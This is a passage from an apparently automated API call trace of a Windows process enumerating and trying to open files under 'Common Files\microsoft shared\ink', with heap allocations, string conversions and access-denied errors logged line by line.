out: lpWideCharStr=0x0) returned 70 [0099.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a828 [0099.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 70 [0099.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.166] GetLastError () returned 0x5 [0099.167] GetLastError () returned 0x5 [0099.167] SetLastError (dwErrCode=0x5) [0099.167] GetLastError () returned 0x5 [0099.167] SetLastError (dwErrCode=0x5) [0099.167] GetLastError () returned 0x5 [0099.167] SetLastError (dwErrCode=0x5) [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.167] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd121ea9a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd121ea9a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc4800, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0099.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.168] AreFileApisANSI () returned 1 [0099.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe", lpUsedDefaultChar=0x0) returned 75 [0099.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.168] AreFileApisANSI () returned 1 [0099.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85c60 [0099.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 75 [0099.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.168] GetFileType (hFile=0x368) returned 0x1 [0099.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0099.169] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.169] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.169] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.169] CloseHandle (hObject=0x368) returned 1 [0099.169] AreFileApisANSI () returned 1 [0099.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85d00 [0099.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 75 [0099.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.170] GetLastError () returned 0x5 [0099.170] GetLastError () returned 0x5 [0099.170] SetLastError (dwErrCode=0x5) [0099.170] GetLastError () returned 0x5 [0099.170] SetLastError (dwErrCode=0x5) [0099.170] GetLastError () returned 0x5 [0099.170] SetLastError (dwErrCode=0x5) [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.170] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.171] AreFileApisANSI () returned 1 [0099.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA", lpUsedDefaultChar=0x0) returned 57 [0099.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.171] AreFileApisANSI () returned 1 [0099.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0099.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 57 [0099.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.171] GetLastError () returned 0x5 [0099.171] GetLastError () returned 0x5 [0099.171] SetLastError (dwErrCode=0x5) [0099.171] GetLastError () returned 0x5 [0099.171] SetLastError (dwErrCode=0x5) [0099.171] GetLastError () returned 0x5 [0099.171] SetLastError (dwErrCode=0x5) [0099.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0099.171] AreFileApisANSI () returned 1 [0099.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 57 [0099.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.172] GetLastError () returned 0x5 [0099.172] GetLastError () returned 0x5 [0099.172] SetLastError (dwErrCode=0x5) [0099.172] GetLastError () returned 0x5 [0099.172] SetLastError (dwErrCode=0x5) [0099.172] GetLastError () returned 0x5 [0099.172] SetLastError (dwErrCode=0x5) [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0099.172] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0099.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.172] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0099.173] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.173] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e126ecb, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e126ecb, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e126ecb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0099.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0099.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.177] AreFileApisANSI () returned 1 [0099.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.177] AreFileApisANSI () returned 1 [0099.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85bc0 [0099.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, 